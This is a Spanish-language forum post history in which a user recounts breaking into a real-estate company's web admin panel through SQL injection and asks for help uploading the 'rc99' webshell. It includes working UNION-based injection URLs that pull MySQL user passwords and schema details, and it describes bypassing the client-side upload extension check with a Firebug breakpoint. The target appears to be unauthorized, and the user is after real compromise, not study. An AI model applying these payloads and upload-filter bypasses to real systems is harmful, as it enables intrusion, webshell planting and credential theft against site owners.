elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Nivel Web / Re: Filtrar Uploader para subir webshell en: 26 Marzo 2010, 16:06 pm
se llama CRSManager.....
2  Seguridad Informática / Nivel Web / Re: Filtrar Uploader para subir webshell en: 26 Marzo 2010, 16:05 pm
salu2, es un crs de una compañia de españa, he podido saltarme la protección mediante el Firebug, poniendo un BP aquí function comprueba_extension(formulario, archivo, imagen, mensaje) {   , luego puedo modificar en el panel de la derecha la extensión de php a jpg i bingo me deja subir..... pero al pulsar luego un boton de guardar .... aix me sale un popup y me dice que no cumple con el tamaño adecuado!!!

Suiguiendo......
3  Seguridad Informática / Nivel Web / Re: Filtrar Uploader para subir webshell en: 26 Marzo 2010, 15:47 pm
Ok muchas gracias por la ayuda, perdon si he saltado alguna norma....... y gracias por la ayuda a los newbaby.

salu2
4  Seguridad Informática / Nivel Web / Re: Filtrar Uploader para subir webshell en: 26 Marzo 2010, 15:35 pm
Y aqui os dejo la funcion uploader:



</script> <script language="javascript">

//Uploader
function comprueba_extension(formulario, archivo, imagen, mensaje) {
   extensiones_permitidas = new Array(".jpg");
   mierror = "";
   //if (!archivo) {
      //Si no tengo archivo, es que no se ha seleccionado un archivo en el formulario
       //mierror = "No has seleccionado ningún archivo";
   //}else{
      //recupero la extensión de este nombre de archivo
      extension = (archivo.substring(archivo.lastIndexOf("."))).toLowerCase();
      //alert (extension);
      //compruebo si la extensión está entre las permitidas
      permitida = false;
     
      for (var i = 0; i < extensiones_permitidas.length; i++) {
         if (extensiones_permitidas == extension) {
         permitida = true;
         break;
         }
      }
      if (!permitida) {
        mierror = mensaje + extensiones_permitidas.join();
      
      
      checkKO = document.getElementById('Img' + imagen + '_KO');
      checkKO.style.display = 'inline';
      
      checkOK = document.getElementById('Img' + imagen + '_OK');
      checkOK.style.display = 'none';
      
      colorInput = document.getElementById('input_Img' + imagen);
      colorInput.style.color = '#CC3300';

      oculta_btnGuardar =  document.getElementById('guardaImg' + imagen);
      oculta_btnGuardar.style.display = 'none';
      
       }else{
     
      //alert(archivo);
          //submito!
         //alert ("Todo correcto. Voy a submitir el formulario.");
         //formulario.submit();
      
      checkOK = document.getElementById('Img' + imagen + '_OK');
      checkOK.style.display = 'inline';
      
      checkKO = document.getElementById('Img' + imagen + '_KO');
      checkKO.style.display = 'none';
      
      colorInput = document.getElementById('input_Img' + imagen);
      colorInput.style.color = '#71A410';
      
      muestra_btnGuardar =  document.getElementById('guardaImg' + imagen);
      muestra_btnGuardar.style.display = 'block';
      
      nombre = document.getElementById('nomImg' + imagen);
      if (nombre.value == ''){
         archivo = document.getElementById('input_Img' + imagen);
         nombre_archivo = (archivo.value.substring(archivo.value.lastIndexOf('\\')));


         var indice = nombre_archivo.indexOf ('.jpg');
         nombre_archivo = nombre_archivo.substr (0,indice);

         var navegador = navigator.appName;
         if (navegador == "Microsoft Internet Explorer"){
            nombre_archivo = nombre_archivo.substr (1);
         }

         nombre.value = nombre_archivo;
      }
      
      
        return 1;
       }
     
   //}
   //si estoy aqui es que no se ha podido submitir
   alert (mierror);
   return 0;
}
5  Seguridad Informática / Nivel Web / Filtrar Uploader para subir webshell en: 26 Marzo 2010, 15:26 pm
Saludos,

He podido accecer a l'administración web mediante SQLi de una inmobiliaria, el tema es intento subir un fichero Shell "rc99" pero el filtro que tiene template me tira error.

He provado con poner lo normal foto.jpg.php , nada lo salta, luego con el Live Http headers he intentado si podia capturar los headers para modificarlo pero no me da nada........

Si alguien tiene alguna idea como bypasear-lo ???!!!!

El codigo fuente o porcion del mismo es este:



<div id="estadoNuevo"
         style="display: block; font-size: 11px; color: #333333"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Nueva Fotografía</strong>
      </div>

      <div id="estadoEdicion"
         style="display: none; font-size: 11px; color: #333333"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Editar Fotografía</strong>
      </div>

      <table border="0">
         <tr>
            <td valign="top" width="400px"><!--Imagen 1-->
            <div id="Img1" style="width: 400px; display: block; padding: 1.5em">
            <table border="0">
               <tr>

                  <td>
                  <div align="right">
                  <div id="Img1_KO" style="display: none"><img
                     src="./images/extension_ko.gif" alt="Fotografía Incorrecta" /></div>
                  <div id="Img1_OK" style="display: none"><img
                     src="./images/extension_ok.gif" alt="Fotografía Correcta" /></div>
                  <div style="display: inline">Fotografía:&nbsp;&nbsp;</div>
                  </div>
                  </td>

                  <td colspan="3">

                  <div style="display: inline"><input id="input_Img1"
                     name="input_Img1" type="file" size="39"
                     onChange="comprueba_extension(this.form, this.form.input_Img1.value, 1, 'Comprueba la extensión de los archivos a subir.\nSólo se pueden subir archivos con extensión:')" />
                  </div>
                  </td>
               </tr>
6  Seguridad Informática / Nivel Web / Re: Casi es Mio SQL inyection en: 23 Marzo 2010, 09:44 am
saludos desde el año 1999 que programa con php y mysql, pero bueno siempre se puede estudiar mas  :rolleyes:
7  Seguridad Informática / Nivel Web / Re: Casi es Mio SQL inyection en: 23 Marzo 2010, 00:45 am
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php  on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75
8  Seguridad Informática / Nivel Web / Re: Casi es Mio SQL inyection en: 23 Marzo 2010, 00:20 am
gracias, pero me da el mismo error, no lo termino de entender!!!
9  Seguridad Informática / Nivel Web / Re: Casi es Mio SQL inyection en: 22 Marzo 2010, 23:44 pm
si he leido y estoy leyendo, por ejemplo uso:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,concat%28host,0x3a,user,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+mysql.user--

para sacr user y pass, pero nada me tira error
10  Seguridad Informática / Nivel Web / Re: Casi es Mio SQL inyection en: 22 Marzo 2010, 23:41 pm
intentando ver las columnas:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,concat%28table_schema,0x3a,table_name,0x3a,column_name%29%20,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+information_schema.columns--

pero nada mysql error....
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines